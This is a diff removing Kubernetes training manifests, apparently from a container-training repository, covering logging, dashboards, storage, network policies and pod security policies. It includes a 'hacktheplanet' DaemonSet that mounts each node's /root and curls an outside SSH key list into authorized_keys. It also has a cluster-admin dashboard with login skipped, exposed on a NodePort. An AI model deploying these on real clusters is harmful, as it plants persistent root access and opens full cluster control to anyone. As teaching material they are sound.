port: 8000
initialDelaySeconds: 10
timeoutSeconds: 5
serviceAccount: elasticsearch-operator


@@ -1,167 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: kube-system
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.config:
inputs:
# Mounted `filebeat-inputs` configmap:
path: ${path.config}/inputs.d/*.yml
# Reload inputs configs as they change:
reload.enabled: false
modules:
path: ${path.config}/modules.d/*.yml
# Reload module configs as they change:
reload.enabled: false
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# hints.enabled: true
processors:
- add_cloud_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-inputs
namespace: kube-system
labels:
k8s-app: filebeat
data:
kubernetes.yml: |-
- type: docker
containers.ids:
- "*"
processors:
- add_kubernetes_metadata:
in_cluster: true
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
spec:
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat-oss:7.0.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: elasticsearch-es.default.svc.cluster.local
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
value: changeme
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: inputs
mountPath: /usr/share/filebeat/inputs.d
readOnly: true
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: inputs
configMap:
defaultMode: 0600
name: filebeat-inputs
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: kube-system
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
---


@@ -1,14 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
labels:
k8s-app: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system


@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hacktheplanet
spec:
selector:
matchLabels:
app: hacktheplanet
template:
metadata:
labels:
app: hacktheplanet
spec:
volumes:
- name: root
hostPath:
path: /root
tolerations:
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
volumeMounts:
- name: root
mountPath: /root
command:
- sh
- -c
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx


@@ -1,18 +0,0 @@
global
daemon
maxconn 256
defaults
mode tcp
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
frontend the-frontend
bind *:80
default_backend the-backend
backend the-backend
server google.com-80 google.com:80 maxconn 32 check
server ibm.fr-80 ibm.fr:80 maxconn 32 check


@@ -1,16 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: haproxy
spec:
volumes:
- name: config
configMap:
name: haproxy
containers:
- name: haproxy
image: haproxy:1
volumeMounts:
- name: config
mountPath: /usr/local/etc/haproxy/
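The pod above expects its configuration in a ConfigMap named `haproxy`; a sketch, assuming the config shown just before it is saved as `haproxy.cfg` and the pod manifest as `haproxy-pod.yaml`:

```shell
kubectl create configmap haproxy --from-file=haproxy.cfg
kubectl apply -f haproxy-pod.yaml
# The TCP frontend on port 80 balances across the two backend servers:
kubectl port-forward pod/haproxy 8000:80 &
curl -s -o /dev/null -w "%{http_code}\n" http://localhost:8000/
```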


@@ -1,13 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
spec:
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 1234


@@ -1,360 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: Namespace
metadata:
name: kubernetes-dashboard
---
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
data:
csrf: ""
---
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
kind: ConfigMap
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster", "dashboard-metrics-scraper"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
verbs: ["get"]
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
rules:
# Allow Metrics Scraper to get metrics from the Metrics server
- apiGroups: ["metrics.k8s.io"]
resources: ["pods", "nodes"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: kubernetesui/dashboard:v2.0.0-rc2
imagePullPolicy: Always
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
- --namespace=kubernetes-dashboard
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
- --enable-skip-login
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsUser: 1001
runAsGroup: 2001
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
nodeSelector:
"beta.kubernetes.io/os": linux
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: dashboard-metrics-scraper
name: dashboard-metrics-scraper
namespace: kubernetes-dashboard
spec:
ports:
- port: 8000
targetPort: 8000
selector:
k8s-app: dashboard-metrics-scraper
---
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
k8s-app: dashboard-metrics-scraper
name: dashboard-metrics-scraper
namespace: kubernetes-dashboard
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: dashboard-metrics-scraper
template:
metadata:
labels:
k8s-app: dashboard-metrics-scraper
annotations:
seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
spec:
containers:
- name: dashboard-metrics-scraper
image: kubernetesui/metrics-scraper:v1.0.2
ports:
- containerPort: 8000
protocol: TCP
livenessProbe:
httpGet:
scheme: HTTP
path: /
port: 8000
initialDelaySeconds: 30
timeoutSeconds: 30
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsUser: 1001
runAsGroup: 2001
serviceAccountName: kubernetes-dashboard
nodeSelector:
"beta.kubernetes.io/os": linux
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
volumes:
- name: tmp-volume
emptyDir: {}
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: dashboard
name: dashboard
spec:
selector:
matchLabels:
app: dashboard
template:
metadata:
labels:
app: dashboard
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kubernetes-dashboard:443,verify=0
image: alpine
name: dashboard
---
apiVersion: v1
kind: Service
metadata:
labels:
app: dashboard
name: dashboard
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: dashboard
type: NodePort
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: insecure-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard


@@ -1,10 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: hello
namespace: default
spec:
containers:
- name: hello
image: nginx


@@ -1,29 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: kaniko-build
spec:
initContainers:
- name: git-clone
image: alpine
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
git clone git://github.com/jpetazzo/container.training /workspace
volumeMounts:
- name: workspace
mountPath: /workspace
containers:
- name: build-image
image: gcr.io/kaniko-project/executor:latest
args:
- "--context=/workspace/dockercoins/rng"
- "--insecure"
- "--destination=registry:5000/rng-kaniko:latest"
volumeMounts:
- name: workspace
mountPath: /workspace
volumes:
- name: workspace
emptyDir: {}


@@ -1,162 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.10.1
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard


@@ -1,110 +0,0 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: local-path-provisioner-role
namespace: local-path-storage
rules:
- apiGroups: [""]
resources: ["nodes", "persistentvolumeclaims"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["endpoints", "persistentvolumes", "pods"]
verbs: ["*"]
- apiGroups: [""]
resources: ["events"]
verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: local-path-provisioner-bind
namespace: local-path-storage
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: local-path-provisioner
namespace: local-path-storage
spec:
replicas: 1
selector:
matchLabels:
app: local-path-provisioner
template:
metadata:
labels:
app: local-path-provisioner
spec:
serviceAccountName: local-path-provisioner-service-account
containers:
- name: local-path-provisioner
image: rancher/local-path-provisioner:v0.0.8
imagePullPolicy: Always
command:
- local-path-provisioner
- --debug
- start
- --config
- /etc/config/config.json
volumeMounts:
- name: config-volume
mountPath: /etc/config/
env:
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
volumes:
- name: config-volume
configMap:
name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
name: local-path-config
namespace: local-path-storage
data:
config.json: |-
{
"nodePathMap":[
{
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
"paths":["/opt/local-path-provisioner"]
}
]
}
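A sketch of exercising the `local-path` StorageClass defined above (the claim name and size are illustrative):

```shell
kubectl apply -f- <<EOF
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: test-local-path
spec:
  accessModes: [ReadWriteOnce]
  storageClassName: local-path
  resources:
    requests:
      storage: 128Mi
EOF
# volumeBindingMode is WaitForFirstConsumer, so the claim stays
# Pending until a pod actually uses it:
kubectl get pvc test-local-path
```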


@@ -1,138 +0,0 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: system:aggregated-metrics-reader
labels:
rbac.authorization.k8s.io/aggregate-to-view: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
resources: ["pods"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
name: metrics-server-auth-reader
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
name: v1beta1.metrics.k8s.io
spec:
service:
name: metrics-server
namespace: kube-system
group: metrics.k8s.io
version: v1beta1
insecureSkipTLSVerify: true
groupPriorityMinimum: 100
versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: metrics-server
namespace: kube-system
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: metrics-server
namespace: kube-system
labels:
k8s-app: metrics-server
spec:
selector:
matchLabels:
k8s-app: metrics-server
template:
metadata:
name: metrics-server
labels:
k8s-app: metrics-server
spec:
serviceAccountName: metrics-server
volumes:
# mount in tmp so we can safely use from-scratch images and/or read-only containers
- name: tmp-dir
emptyDir: {}
containers:
- name: metrics-server
image: k8s.gcr.io/metrics-server-amd64:v0.3.3
imagePullPolicy: Always
volumeMounts:
- name: tmp-dir
mountPath: /tmp
args:
- --kubelet-preferred-address-types=InternalIP
- --kubelet-insecure-tls
- --metric-resolution=5s
---
apiVersion: v1
kind: Service
metadata:
name: metrics-server
namespace: kube-system
labels:
kubernetes.io/name: "Metrics-server"
spec:
selector:
k8s-app: metrics-server
ports:
- port: 443
protocol: TCP
targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
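Once the deployment above is running, resource metrics are served through the `v1beta1.metrics.k8s.io` APIService; a quick sketch:

```shell
kubectl -n kube-system rollout status deployment metrics-server
kubectl top nodes
kubectl top pods --all-namespaces
```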


@@ -1,14 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-testcurl-for-testweb
spec:
podSelector:
matchLabels:
app: testweb
ingress:
- from:
- podSelector:
matchLabels:
run: testcurl


@@ -1,10 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-all-for-testweb
spec:
podSelector:
matchLabels:
app: testweb
ingress: []


@@ -1,22 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector:
matchLabels:
ingress:
- from:
- podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-webui
spec:
podSelector:
matchLabels:
app: webui
ingress:
- from: []
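A sketch of verifying the `allow-testcurl-for-testweb` policy shown earlier (the labels match its pod selectors; `kubectl run` labels the client pod `run=testcurl` automatically):

```shell
kubectl run testweb --image=nginx --labels=app=testweb
kubectl expose pod testweb --port=80
# This should succeed; a pod with any other label should time out:
kubectl run testcurl --rm -it --image=alpine -- wget -qO- -T 2 http://testweb
```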


@@ -1,8 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-without-volume
spec:
containers:
- name: nginx
image: nginx


@@ -1,13 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-volume
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/


@@ -1,21 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-git
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/
- name: git
image: alpine
command: [ "sh", "-c", "apk add git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/
restartPolicy: OnFailure


@@ -1,20 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-init
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/
initContainers:
- name: git
image: alpine
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/


@@ -1,98 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: persistentconsul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: persistentconsul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: persistentconsul
subjects:
- kind: ServiceAccount
name: persistentconsul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: persistentconsul
---
apiVersion: v1
kind: Service
metadata:
name: persistentconsul
spec:
ports:
- port: 8500
name: http
selector:
app: persistentconsul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: persistentconsul
spec:
serviceName: persistentconsul
replicas: 3
selector:
matchLabels:
app: persistentconsul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: persistentconsul
spec:
serviceAccountName: persistentconsul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- persistentconsul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.6"
volumeMounts:
- name: data
mountPath: /consul/data
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=persistentconsul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave

File diff suppressed because it is too large.


@@ -1,37 +0,0 @@
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: postgres
spec:
selector:
matchLabels:
app: postgres
serviceName: postgres
template:
metadata:
labels:
app: postgres
spec:
#schedulerName: stork
initContainers:
- name: rmdir
image: alpine
volumeMounts:
- mountPath: /vol
name: postgres
command: ["sh", "-c", "if [ -d /vol/lost+found ]; then rmdir /vol/lost+found; fi"]
containers:
- name: postgres
image: postgres:11
volumeMounts:
- mountPath: /var/lib/postgresql/data
name: postgres
volumeClaimTemplates:
- metadata:
name: postgres
spec:
accessModes: ["ReadWriteOnce"]
resources:
requests:
storage: 1Gi


@@ -1,39 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: privileged
annotations:
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
privileged: true
allowPrivilegeEscalation: true
allowedCapabilities:
- '*'
volumes:
- '*'
hostNetwork: true
hostPorts:
- min: 0
max: 65535
hostIPC: true
hostPID: true
runAsUser:
rule: 'RunAsAny'
seLinux:
rule: 'RunAsAny'
supplementalGroups:
rule: 'RunAsAny'
fsGroup:
rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:privileged
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['privileged']


@@ -1,38 +0,0 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
annotations:
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
name: restricted
spec:
allowPrivilegeEscalation: false
fsGroup:
rule: RunAsAny
runAsUser:
rule: RunAsAny
seLinux:
rule: RunAsAny
supplementalGroups:
rule: RunAsAny
volumes:
- configMap
- emptyDir
- projected
- secret
- downwardAPI
- persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:restricted
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['restricted']


@@ -1,15 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: registry
spec:
containers:
- name: registry
image: registry
env:
- name: REGISTRY_HTTP_ADDR
valueFrom:
configMapKeyRef:
name: registry
key: http.addr
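The pod above reads `REGISTRY_HTTP_ADDR` from a ConfigMap named `registry`; a sketch of creating it (the listen address is illustrative, and `registry-pod.yaml` is an assumed file name):

```shell
kubectl create configmap registry --from-literal=http.addr=0.0.0.0:5000
kubectl apply -f registry-pod.yaml
# The registry should answer on the configured port:
kubectl exec registry -- wget -qO- http://localhost:5000/v2/_catalog
```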


@@ -1,67 +0,0 @@
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "2"
creationTimestamp: null
generation: 1
labels:
app: socat
name: socat
namespace: kube-system
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
spec:
replicas: 1
selector:
matchLabels:
app: socat
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: socat
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard:443,verify=0
image: alpine
